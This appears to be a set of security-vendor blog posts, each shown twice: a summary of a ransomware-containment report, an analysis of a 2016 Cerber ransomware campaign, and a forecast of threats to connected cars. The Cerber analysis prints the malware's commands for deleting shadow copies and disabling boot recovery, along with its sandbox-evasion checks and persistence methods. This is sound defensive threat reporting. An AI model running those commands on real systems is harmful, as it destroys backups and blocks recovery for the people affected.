              Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

              Acknowledgements

              A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

              Catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.

              Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

              UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report:

              • Windows Firewall rule configurations to block specific binaries from establishing outbound connections from endpoints
              • Domain Controller isolation and recovery planning steps
              • Proactive GPO permissions review and monitoring guidance

              Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

              In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

              Ransomware is commonly deployed across an environment in two ways:

              1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
                • Manually run encryptors on targeted systems.
                • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
                • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
                • Deploy encryptors with existing software deployment tools utilized by the victim organization.
              2. Automated propagation:
                • Credential or Windows token extraction from disk or memory.
                • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
                • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

              The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

              • Endpoint segmentation
              • Hardening against common exploitation methods
              • Reducing the exposure of privileged and service accounts
              • Cleartext password protections

              If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

              Read the report today.

              *Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

              Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

              UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report:

              • Windows Firewall rule configurations to block specific binaries from establishing outbound connections from endpoints
              • Domain Controller isolation and recovery planning steps
              • Proactive GPO permissions review and monitoring guidance

              Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

              In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

              Ransomware is commonly deployed across an environment in two ways:

              1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
                • Manually run encryptors on targeted systems.
                • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
                • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
                • Deploy encryptors with existing software deployment tools utilized by the victim organization.
              2. Automated propagation:
                • Credential or Windows token extraction from disk or memory.
                • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
                • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

              The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

              • Endpoint segmentation
              • Hardening against common exploitation methods
              • Reducing the exposure of privileged and service accounts
              • Cleartext password protections

              If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

              Read the report today.

              *Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

              Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

              Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

              On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

              Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

              FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

              Attack Process

              The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

              1. Target receives and opens a Word document.
              2. Macro in document is invoked to run PowerShell in hidden mode.
              3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
              4. On successful connection, the ransomware is written to the disk of the victim.
              5. PowerShell executes the ransomware.
              6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
              7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
              8. Files are encrypted and messages are presented to the user requesting payment.

              Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

              The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

              PowerShell Abuse

              When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

              Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

              It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

              In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

              Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

              Cerber in Action

              Initial payload behavior

              Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

              If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

              Shadow deletion

              As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

              Vssadmin.exe "delete shadows /all /quiet"

              WMIC.exe "shadowcopy delete"

              Bcdedit.exe "/set {default} recoveryenabled no"

              Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

              Coercion

              People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

              Figure 2. A message to the victim after encryption

              The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

               

               

              Figure 3. Ransom offered to victim, which is discounted for five days

              Multilingual Support

              As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

              Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

              Encryption

              Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

              Selective Targeting

              Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

              The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

              Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

              Anti VM Checks

              The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

              Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

              Persistence

              Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

              • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
              • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
              • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
              • Common persistence methods such as run and runonce key are also used.
              A Solid Defense

              Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

              Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

              Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

              FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

              Conclusion

              Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

              Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

              HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

              Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

              Click here for more information about Exploit Guard technology.

              Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

              Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

              On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

              Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

              FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

              Attack Process

              The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

              1. Target receives and opens a Word document.
              2. Macro in document is invoked to run PowerShell in hidden mode.
              3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
              4. On successful connection, the ransomware is written to the disk of the victim.
              5. PowerShell executes the ransomware.
              6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
              7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
              8. Files are encrypted and messages are presented to the user requesting payment.

              Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

              The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

              PowerShell Abuse

              When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

              Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

              It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

              In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

              Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

              Cerber in Action

              Initial payload behavior

              Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

              If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

              Shadow deletion

              As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

              Vssadmin.exe "delete shadows /all /quiet"

              WMIC.exe "shadowcopy delete"

              Bcdedit.exe "/set {default} recoveryenabled no"

              Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

              Coercion

              People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

              Figure 2. A message to the victim after encryption

              The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

               

               

              Figure 3. Ransom offered to victim, which is discounted for five days

              Multilingual Support

              As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

              Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

              Encryption

              Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

              Selective Targeting

              Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

              The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

              Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

              Anti VM Checks

              The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

              Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

              Persistence

              Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

              • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
              • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
              • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
              • Common persistence methods such as run and runonce key are also used.
              A Solid Defense

              Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

              Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

              Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

              FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

              Conclusion

              Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

              Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

              HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

              Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

              Click here for more information about Exploit Guard technology.

              Connected Cars: The Open Road for Hackers

              As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

              Car Hacking?

              Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

              Ransomware

              The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make them attractive ransomware targets. In contrast to ransomware that infects ordinary computer systems, vehicles are more likely susceptible to ransomware attacks when their disablement causes knock-on effects.

              For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

              Malicious C2 and Final Hop Points

              One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

              Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

              Understanding the Risk Landscape

              The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

              These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

              FireEye Capabilities

              FireEye combines our industry leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve their prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can provide firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because threat attackers are consistently evolving.

              For more information, contact FireEye.

              FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.

              Connected Cars: The Open Road for Hackers

              As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

              Car Hacking?

              Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

              Ransomware

              The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make them attractive ransomware targets. In contrast to ransomware that infects ordinary computer systems, vehicles are more likely susceptible to ransomware attacks when their disablement causes knock-on effects.

              For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

              Malicious C2 and Final Hop Points

              One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

              Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

              Understanding the Risk Landscape

              The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

              These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

              FireEye Capabilities

              FireEye combines our industry leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve their prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can provide firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because threat attackers are consistently evolving.

              For more information, contact FireEye.

              FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.